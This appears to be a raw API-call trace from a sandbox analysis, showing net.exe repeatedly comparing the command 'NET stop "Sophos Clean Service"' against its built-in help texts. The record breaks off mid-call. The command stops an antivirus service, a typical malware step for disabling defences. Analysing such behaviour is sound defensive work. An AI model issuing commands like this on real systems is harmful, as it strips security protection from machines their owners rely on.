[0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x1b [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x23) returned 13 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xbe [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"te", _MaxCount=0x23) returned 12 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x33 [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET c", _MaxCount=0x23) returned 11 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x19 [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x23) returned 11 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc1 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMEN", _MaxCount=0x23) returned 7 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x16 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x23) returned 3 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x33 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DEL", _MaxCount=0x23) returned 15 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x234 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sha", _MaxCount=0x23) returned 12 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x13 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x23) returned 14 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x23) returned 14 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x23) returned 14 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x23) returned 14 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.155] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x23) returned 14 [0199.155] LocalFree (hMem=0x8a5630) returned 0x0 [0199.155] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x16 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x11 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x12 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xf [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x17 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x18 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x2a [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERV", _MaxCount=0x23) returned 14 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x23) returned 19 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x58 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMA", _MaxCount=0x23) returned -1 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x184 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\comput", _MaxCount=0x23) returned -2 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc7 [0199.156] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] ", _MaxCount=0x23) returned -2 [0199.156] LocalFree (hMem=0x8a5630) returned 0x0 [0199.156] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x47 [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] ", _MaxCount=0x23) returned -3 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc2 [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CO", _MaxCount=0x23) returned 19 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x319 [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to ", _MaxCount=0x23) returned -5 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x483 [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions a", _MaxCount=0x23) returned -5 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xa86 [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names", _MaxCount=0x23) returned 4 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x54 [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="\r\nFor more information on tools see", _MaxCount=0x23) returned 97 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xad [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET ACCOUNTS\r\n[/FORCELOG", _MaxCount=0x18) returned 18 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x2e [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET COMPUTER\r\n\\\\computer", _MaxCount=0x18) returned 16 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x7d [0199.157] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET CONFIG SERVER\r\n[/AUT", _MaxCount=0x18) returned 16 [0199.157] LocalFree (hMem=0x8a5630) returned 0x0 [0199.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x26 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET CONFIG\r\n[SERVER | WO", _MaxCount=0x18) returned 16 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x19 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET CONTINUE\r\nservice\r\n\r", _MaxCount=0x18) returned 16 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x1b [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET FILE\r\n[id [/CLOSE]]\r", _MaxCount=0x18) returned 13 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xbe [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET GROUP\r\n[groupname [/", _MaxCount=0x18) returned 12 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x33 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x18) returned 11 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x19 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET HELPMSG\r\nmessage#\r\n\r", _MaxCount=0x18) returned 11 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc1 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET LOCALGROUP\r\n[groupna", _MaxCount=0x18) returned 7 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x16 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x18) returned 3 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x33 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET SESSION\r\n[\\\\computer", _MaxCount=0x18) returned 15 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x234 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x18) returned 12 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x13 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START BROWSER\r\n", _MaxCount=0x18) returned 14 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x18) returned 14 [0199.158] LocalFree (hMem=0x8a5630) returned 0x0 [0199.158] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.158] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START EVENTLOG\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START MESSENGER\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START NET LOGON\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x16 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x11 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START RPCSS\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START SCHEDULE\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x12 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START SERVER\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xf [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START UPS\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x17 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START WORKSTATION\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x18 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x2a [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET STATISTICS\r\n[WORKSTA", _MaxCount=0x18) returned 14 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x18) returned 19 [0199.159] LocalFree (hMem=0x8a5630) returned 0x0 [0199.159] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x58 [0199.159] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET TIME\r\n\r\n[\\\\computern", _MaxCount=0x18) returned -1 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x184 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET USE\r\n[devicename | *", _MaxCount=0x18) returned -2 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, 